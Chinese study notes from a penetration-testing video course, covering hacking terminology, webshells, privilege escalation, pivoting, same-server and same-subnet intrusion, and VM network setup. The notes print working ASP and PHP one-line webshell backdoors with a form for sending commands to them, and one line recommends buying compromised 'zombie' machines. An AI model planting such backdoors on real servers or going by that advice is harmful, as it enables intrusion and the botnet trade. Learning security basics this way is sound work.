Cracer渗透视频课程学习笔记——基础知识(1)
-
- 常見的術(shù)語介紹
- 腳本(asp,php,jsp):可以編寫動態(tài)網(wǎng)站的,瀏覽器右擊查看不到,只能看到靜態(tài)代碼。
- html(css,js,html):解釋語言,靜態(tài)的,瀏覽器右擊查看源碼可以看到
- HTTP協(xié)議:定義一個瀏覽器通信標注,http不安全,明文傳輸,可以嗅探到登錄密?????? 碼。(https,對數(shù)據(jù)進行了加密相比較安全一點)
- CMS(B/S):網(wǎng)站管理系統(tǒng)(DZ,dedecms,南方,帝國,織夢,discuz)
- MD5:加密哈希值,可以解密
- 肉雞:被黑客入侵并長期駐扎的計算機或者服務(wù)器。(自己抓三個肉雞就要入獄了,建議買肉雞,不要自己抓)
- 抓雞:利用使用大量程序漏洞,使用自動化方式獲取肉雞行為
- Webshell:通過Web入侵的一種腳本工具,可以據(jù)此對網(wǎng)站服務(wù)進行一定程度的控制。
- 一句話【木馬】:通過向服務(wù)端提交一句簡短的代碼配合本地客戶端實現(xiàn)Webshell功能的木馬;
<%eval request("pass")%>
<%execute(request("pass"))%>
<%system()%>
request("pass")接收客戶機提交的數(shù)據(jù),pass為執(zhí)行命令的參數(shù)值。
eval/execute 函數(shù)執(zhí)行客戶端命令的內(nèi)容
(注:一句話本身沒有危害性,最重要是看傳的是什么東西)
如:PHP的一句話木馬:
<?php eval($_POST[cracer]);?>
下面的代碼可以用POST的方式提交PHP語句,利用php腳本的各種函數(shù),就可以執(zhí)行系統(tǒng)命令、修改數(shù)據(jù)庫、增刪改文件等等的各種功能。
<form method=post action=http://木馬地址>
<textarea name = cracer>
//這里寫php代碼
Phpinfo();
</textarea>
<input type=submit>
</form>
?
注:一句話木馬是從2010以后才出的,以前都是小馬大馬。
????? 小馬:用來上傳大馬
????? 大馬:用來提權(quán)用
????? 統(tǒng)稱為webshell,網(wǎng)站后門
-
- 提權(quán):操作系統(tǒng)低權(quán)限賬戶將自己提升為管理員權(quán)限使用的方法
- 后門:黑客為了對主機進行長期的控制,在機器上種植一段程序或留下一個入口,方便下次進入(最簡單的后門就是創(chuàng)建一個賬戶)
- 跳板:使用肉雞IP來試試共計其他目標,以便更好的隱藏自己的身份信息。
- 旁站入侵:由于一個服務(wù)器可能上面有許多的網(wǎng)站,可能現(xiàn)在想攻擊的網(wǎng)站沒有漏洞,但是假如有十個網(wǎng)站,有一個網(wǎng)站有漏洞,就可以通過這個網(wǎng)站入侵其他的網(wǎng)站。即同服務(wù)器下的王戰(zhàn)1入侵,入侵之后可以通過提權(quán)跨目錄等手段拿到目標網(wǎng)站的權(quán)限。常見的旁站查詢工具有:WebRobot、御劍、明小子和web在線查詢等。
- C段入侵:即同C段下服務(wù)器入侵。如目標ip為192.168.1.253入侵192.168.1.*的任意一臺機器,然后利用一些黑客工具嗅探獲取在網(wǎng)絡(luò)商傳輸?shù)母鞣N信息。常用的工具有:在Windows下有Cain,在UNIX環(huán)境下有Sniffit,Snoop,Tcpdump,Dsniff等。
- 滲透測試:
- 黑盒測試:在未授權(quán)的情況下,模擬黑客的共計方法和思維方式,在評估計算機網(wǎng)絡(luò)系統(tǒng)可能存在的安全風(fēng)險。
黑盒測試不同于黑客入侵,并不等于黑站。黑盒測試考驗的是綜合能力(OS、Datebase、Script、code、思路、社工)
思路余經(jīng)驗積累往往決定成敗。
-
- 白盒測試:相對黑盒測試,白盒測試基本是從內(nèi)部發(fā)起
- 黑白盒的另一種說法:知道源代碼和不知道源代碼的滲透測試。這是,黑盒測試還是傳統(tǒng)的滲透測試,而白盒測試就偏向代碼審計。
小知識:POC:漏洞驗證;EXP:漏洞利用。
?????? 關(guān)于虛擬機網(wǎng)絡(luò)部分知識點:如下圖有三個類型,其中LAN一般用不著,常用上面三個
如果想要虛擬機上網(wǎng),一般選擇NAT模式,然后虛擬機Win+R輸入ncpa.cpl設(shè)置為自動獲取IP
?
在虛擬機編輯下面有一個虛擬網(wǎng)絡(luò)編輯器,這里可以設(shè)置虛擬機IP區(qū)域
這個時候用主機ping虛擬機是可以ping通的。但是如果是第二個僅主機模式,就是也可以ping通但是虛擬機無法上網(wǎng)的
?
?
?
如何讓外網(wǎng)的用戶訪問到虛擬機里面搭建的網(wǎng)站:核心把虛擬機網(wǎng)絡(luò)跟物理機放在同一個網(wǎng)絡(luò)中。
第一步選擇橋接模式,復(fù)制物理網(wǎng)絡(luò)。
學(xué)習(xí)搭建一個網(wǎng)站,網(wǎng)上下載的源碼在虛擬機中打開
然后在主機復(fù)制http://127.0.0.1:99/注意把127.0.0.1改成虛擬機地址,這個99保留是代表開放端口,不保留訪問不到
第二步,路由器設(shè)置端口映射,就可以外網(wǎng)訪問了
?
如果無法訪問可能是由于防火墻問題。
注:遇到問題
????????? 當安裝好了Windows Server 2003時候連接不上網(wǎng)了?
其實如果輸入正確的網(wǎng)址就會進入網(wǎng)站
?
?
?
?
?
?
總結(jié)
以上是生活随笔為你收集整理的Cracer渗透视频课程学习笔记——基础知识(1)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: tushare股票数据接口
- 下一篇: Cracer渗透视频课程笔记——基础知识